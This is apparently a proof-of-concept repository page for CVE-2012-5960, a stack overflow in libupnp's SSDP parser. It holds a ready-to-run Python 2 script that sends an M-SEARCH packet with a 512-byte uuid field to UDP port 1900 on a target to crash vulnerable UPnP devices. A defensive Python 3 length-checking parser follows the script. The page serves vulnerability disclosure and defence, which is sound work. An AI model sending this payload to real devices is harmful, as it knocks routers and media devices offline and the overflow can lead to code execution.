
CVE-2012-5960 PoC — UPnP Devices 'unique_service_name' function stack-based buffer overflow vulnerability

Associated Vulnerability
Title: UPnP Devices 'unique_service_name' function stack-based buffer overflow vulnerability (CVE-2012-5960)
Description: libupnp is a portable, open-source UPnP development kit that provides an API and source code. The 'unique_service_name' function in ssdp/ssdp_server.c in the SSDP parser of the portable SDK for UPnP Devices (aka libupnp, formerly the Intel SDK for UPnP Devices) before 1.6.18 contains a stack-based buffer overflow. A remote attacker can exploit this vulnerability to execute arbitrary code via a long UDN (aka upnp:rootdevice) field in a UDP packet.
Description
CVE-2012-5960, CVE-2012-5959 Proof of Concept
Readme
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept

A quick note on something I have been playing with recently.

```python
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py

import socket

TARGET = 'TARGET_IP'

'''
# A normal SSDP discovery request, kept for comparison with the payload below.
normal_traffic = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:upnp:rootdevice\r\n'                    \
    '\r\n'
'''

# Same M-SEARCH, but the ST header carries a 512-byte uuid field. libupnp
# before 1.6.18 copies it into a fixed-size stack buffer in
# unique_service_name() (CVE-2012-5960), so a vulnerable device crashes.
dos = \
    'M-SEARCH * HTTP/1.1\r\n'                   \
    'HOST:239.255.255.250:1900\r\n'             \
    'MX:3\r\n'                                  \
    'MAN:"ssdp:discover"\r\n'                   \
    'ST:uuid:schemas:device:{}:anything\r\n'    \
    '\r\n'.format("A"*512)

# Set up UDP socket and send the request to the SSDP port
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))

# A healthy device answers the M-SEARCH; no reply within the timeout is
# taken as a successful crash.
try:
    while True:
        data, addr = s.recvfrom(65507)  # Maximum UDP data length
        print "------------------------\nFailed DoS...\n------------------------\n"
        print "Response:"
        print addr, data
        exit(1)
except socket.timeout:
    print "------------------------\nSuccessful DoS!!!\n------------------------\n"
    exit(0)
```
Tested on libupnp 1.6.13:

![libupnp_1.6.13_CVEmarked](https://imgur.com/IhyUdp8.png)

Demo video:

[![](http://img.youtube.com/vi/3W3NO3nnKJM/0.jpg)](http://www.youtube.com/watch?v=3W3NO3nnKJM "")
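As a defensive counterpart to the PoC above, here is an added example (not code from this repository or from libupnp) in Python 3: it parses an SSDP datagram and enforces length limits on the ST/USN/NT values before they are used, rejecting the oversized uuid field the PoC sends. The 180- and 64-character caps are illustrative assumptions, not libupnp's real buffer sizes.

```python
# Added example, not code from the PoC repository: a defensive SSDP check that
# parses a datagram and rejects the oversized uuid field the PoC above sends.
# Assumption: the 180/64 limits are illustrative caps, not libupnp's buffer sizes.
MAX_VALUE_LEN = 180   # whole ST/USN/NT header value
MAX_UUID_LEN = 64     # the udn part after "uuid:" (USN form: uuid:<udn>::<urn>)


def parse_ssdp(datagram: bytes) -> tuple:
    """Return (start_line, {NAME: value}) for an HTTP-over-UDP SSDP message."""
    text = datagram.decode("latin-1")           # SSDP is ASCII; never choke on bytes
    start_line, _, rest = text.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        if line == "":                           # blank line ends the header block
            break
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().upper()] = value.strip()
    return start_line, headers


def check_ssdp(datagram: bytes) -> tuple:
    """Return (accepted, reason); limits are enforced before any field is used."""
    try:
        start_line, headers = parse_ssdp(datagram)
    except ValueError as exc:
        return False, "parse error: %s" % exc
    if not start_line.startswith(("M-SEARCH ", "NOTIFY ")):
        return False, "unexpected start line %r" % start_line[:20]
    for field in ("ST", "USN", "NT"):
        value = headers.get(field)
        if value is None:
            continue
        if len(value) > MAX_VALUE_LEN:
            return False, "%s value too long (%d chars)" % (field, len(value))
        if value.startswith("uuid:") and len(value[5:].split("::", 1)[0]) > MAX_UUID_LEN:
            return False, "%s uuid component too long" % field
    return True, "ok"


# Constructed samples: the normal discovery request and the PoC-shaped one.
NORMAL = (b"M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nMX:3\r\n"
          b'MAN:"ssdp:discover"\r\nST:upnp:rootdevice\r\n\r\n')
MALFORMED = (b"M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nMX:3\r\n"
             b'MAN:"ssdp:discover"\r\nST:uuid:schemas:device:' + b"A" * 512 + b":anything\r\n\r\n")

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL), ("malformed", MALFORMED)):
        print(name, check_ssdp(pkt))
```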
File Snapshot

```
/data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── libupnp_DoS_PoC.py            (1.2K)
├── README.md                     (1.5K)
└── ssdp_server(libupnp_1.6.13).c (35K)

0 directories, 3 files
```